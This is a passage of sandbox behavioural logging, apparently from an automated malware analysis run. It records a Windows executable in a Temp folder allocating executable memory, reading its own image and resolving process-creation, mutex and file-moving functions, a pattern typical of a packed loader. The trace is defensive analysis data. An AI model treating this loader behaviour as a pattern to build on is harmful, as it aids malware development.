"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\Local AppData" } ], "repeated": 0, "id": 379 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000000cc" }, { "name": "ValueName", "value": "000603xx" }, { "name": "Type", "value": "1", "pretty_value": "REG_SZ" }, { "name": "Information", "value": "kernel32.dll" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Versions\\000603xx" } ], "repeated": 0, "id": 380 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "kernel32.dll" }, { "name": "BaseAddress", "value": "0x75860000" } ], "repeated": 0, "id": 381 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "SortGetHandle" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7587eb20" } ], "repeated": 0, "id": 382 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "SortCloseHandle" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758797e0" } ], "repeated": 0, "id": 383 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "filesystem", "api": "NtCreateFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000002cc" }, { "name": "DesiredAccess", "value": "0x80100080", "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\Globalization\\Sorting\\sortdefault.nls" }, { "name": "CreateDisposition", "value": "1", "pretty_value": "FILE_OPEN" }, { "name": "ShareAccess", "value": "1", "pretty_value": "FILE_SHARE_READ" }, { "name": "FileAttributes", "value": "0x00000080", "pretty_value": "FILE_ATTRIBUTE_NORMAL" }, { "name": "ExistedBefore", "value": "yes" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 384 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "process", "api": "NtCreateSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x000002d4" }, { "name": "DesiredAccess", "value": "0x000f0005", "pretty_value": "STANDARD_RIGHTS_REQUIRED|SECTION_QUERY|SECTION_MAP_READ" }, { "name": "ObjectAttributes", "value": "" }, { "name": "FileHandle", "value": "0x000002cc" } ], "repeated": 0, "id": 385 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x000002d4" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x05500000" }, { "name": "SectionOffset", "value": "0x001904cc" }, { "name": "ViewSize", "value": "0x00338000" }, { "name": "Win32Protect", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 386 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000002d4" } ], "repeated": 0, "id": 387 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000002cc" } ], "repeated": 0, "id": 388 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000002cc" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\Registry\\Machine\\System\\CurrentControlSet\\Control\\Nls\\Sorting\\Ids" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Nls\\Sorting\\Ids" } ], "repeated": 0, "id": 389 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000002cc" }, { "name": "ValueName", "value": "es-ES" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Ids\\es-ES" } ], "repeated": 0, "id": 390 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000002cc" }, { "name": "ValueName", "value": "es" }, { "name": "Type", "value": "1", "pretty_value": "REG_SZ" }, { "name": "Information", "value": "{0000002B-57EE-1E5C-00B4-D0000BB1E11E}" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Ids\\es" } ], "repeated": 0, "id": 391 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000002c0" } ], "repeated": 0, "id": 392 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000002d0" } ], "repeated": 0, "id": 393 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "filesystem", "api": "NtQueryAttributesFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "C:\\Users\\pacop\\AppData\\Local" } ], "repeated": 0, "id": 394 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 395 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x00000120" }, { "name": "ObjectAttributesName", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\KnownFolderSettings" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\KnownFolderSettings" } ], "repeated": 0, "id": 396 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 397 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x00000120" }, { "name": "ObjectAttributesName", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\KnownFolderSettings" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\KnownFolderSettings" } ], "repeated": 0, "id": 398 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 399 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x0040910a", "parentcaller": "0x0040a2a7", "category": "filesystem", "api": "NtCreateFile", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "FileHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x80100080", "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Users\\pacop\\AppData\\Local\\CSIDL_" }, { "name": "CreateDisposition", "value": "1", "pretty_value": "FILE_OPEN" }, { "name": "ShareAccess", "value": "1", "pretty_value": "FILE_SHARE_READ" }, { "name": "FileAttributes", "value": "0x00000000" }, { "name": "ExistedBefore", "value": "no" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 400 }, { "timestamp": "2025-03-02 21:32:28,019", "thread_id": "4148", "caller": "0x00409133", "parentcaller": "0x0040a2a7", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x05840000" }, { "name": "RegionSize", "value": "0x002e1000" }, { "name": "Protection", "value": "0x00000040", "pretty_value": "PAGE_EXECUTE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 401 }, { "timestamp": "2025-03-02 21:32:28,019", "thread_id": "4148", "caller": "0x00409148", "parentcaller": "0x0040a2a7", "category": "filesystem", "api": "NtQueryInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000280" }, { "name": "HandleName", "value": "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe" }, { "name": "FileInformationClass", "value": "5", "pretty_value": "FileStandardInformation" }, { "name": "FileInformation", "value": "\\x00\\x10.\\x00\\x00\\x00\\x00\\x00F\\x03.\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 402 }, { "timestamp": "2025-03-02 21:32:28,284", "thread_id": "4148", "caller": "0x00409157", "parentcaller": "0x0040a2a7", "category": "filesystem", "api": "NtReadFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000280" }, { "name": "HandleName", "value": "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe" }, { "name": "Buffer", "value": "MZ\\x90\\x00\\x03\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\xff\\xff\\x00\\x00\\xb8\\x00\\x00\\x00\\x00\\x00\\x00\\x00@\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf8\\x00\\x00\\x00\\x0e\\x1f\\xba\\x0e\\x00\\xb4\t\\xcd!\\xb8\\x01L\\xcd!This program cannot be run in DOS mode.\r\r\n$\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd3\\x96+\\xa7\\x97\\xf7E\\xf4\\x97\\xf7E\\xf4\\x97\\xf7E\\xf4T\\xf8\\x18\\xf4\\x91\\xf7E\\xf4\\x14\\xebK\\xf4\\x95\\xf7E\\xf4\\xf8\\xe8O\\xf4\\x9c\\xf7E\\xf4\\xf8\\xe8A\\xf4\\x95\\xf7E\\xf4\\xa1\\xd1N\\xf4\\x94\\xf7E\\xf4\\xa1\\xd1A\\xf4\\x94\\xf7E\\xf4\\x97\\xf7D\\xf4R\\xf7E\\xf4\\x7f\\xe8N\\xf4\\x91\\xf7E\\xf4P\\xf1C\\xf4\\x96\\xf7E\\xf4Rich\\x97\\xf7E\\xf4\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00PE\\x00\\x00L\\x01\\x04\\x00" }, { "name": "Length", "value": "3015494" } ], "repeated": 0, "id": 403 }, { "timestamp": "2025-03-02 21:32:28,284", "thread_id": "4148", "caller": "0x004091bf", "parentcaller": "0x0040a2a7", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0xffffffff" } ], "repeated": 1, "id": 404 }, { "timestamp": "2025-03-02 21:32:28,284", "thread_id": "4148", "caller": "0x004091c9", "parentcaller": "0x0040a2a7", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000280" } ], "repeated": 0, "id": 405 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x0040929a", "parentcaller": "0x0040a2a7", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x04970000" }, { "name": "RegionSize", "value": "0x00074000" }, { "name": "Protection", "value": "0x00000040", "pretty_value": "PAGE_EXECUTE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 406 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x004074e9", "parentcaller": "0x0040941c", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "kernel32.dll" }, { "name": "BaseAddress", "value": "0x75860000" } ], "repeated": 0, "id": 407 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x004074f0", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetProcAddress" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7587f7f0" } ], "repeated": 0, "id": 408 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x004074ff", "parentcaller": "0x0040941c", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "kernel32.dll" }, { "name": "BaseAddress", "value": "0x75860000" } ], "repeated": 0, "id": 409 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x00407506", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetModuleHandleA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75880d00" } ], "repeated": 0, "id": 410 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x00407516", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 411 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x00407519", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetModuleFileNameA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758810d0" } ], "repeated": 0, "id": 412 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x0040752d", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 413 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x00407530", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetModuleFileNameW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75880ba0" } ], "repeated": 0, "id": 414 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x00407544", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 415 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x00407547", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CreateProcessA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75895130" } ], "repeated": 0, "id": 416 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x00407555", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 417 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x00407558", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CreateProcessW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758788e0" } ], "repeated": 0, "id": 418 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x00407565", "parentcaller": "0x0040941c", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "kernel32.dll" }, { "name": "BaseAddress", "value": "0x75860000" } ], "repeated": 0, "id": 419 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x00407568", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CloseHandle" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75883150" } ], "repeated": 0, "id": 420 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x00407576", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 421 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x00407579", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "OpenMutexA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75872e60" } ], "repeated": 0, "id": 422 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x0040758d", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 423 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x00407590", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CreateMutexA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758831e0" } ], "repeated": 0, "id": 424 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x004075a4", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 425 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x004075a7", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CreateFileA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758833a0" } ], "repeated": 0, "id": 426 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x004075bb", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 427 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x004075be", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CreateFileW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758833b0" } ], "repeated": 0, "id": 428 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x004075cf", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 429 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x004075d2", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetFileSize" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758835d0" } ], "repeated": 0, "id": 430 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x004075e3", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 431 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x004075e6", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "ReadFile" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75883730" } ], "repeated": 0, "id": 432 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x004075fa", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 433 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x004075fd", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetSystemDirectoryA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75878480" } ], "repeated": 0, "id": 434 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x00407611", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 435 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x00407614", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetSystemDirectoryW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75881350" } ], "repeated": 0, "id": 436 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x00407622", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 437 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x00407625", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "SetFileAttributesW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758837a0" } ], "repeated": 0, "id": 438 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x00407636", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 439 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x00407639", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "MoveFileExW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758799b0" } ], "repeated": 0, "id": 440 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x0040764f", "parentcaller": "0x0040941c", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "shell32.dll" }, { "name": "BaseAddress", "value": "0x75c40000" } ], "repeated": 0, "id": 441 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x00407652", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { 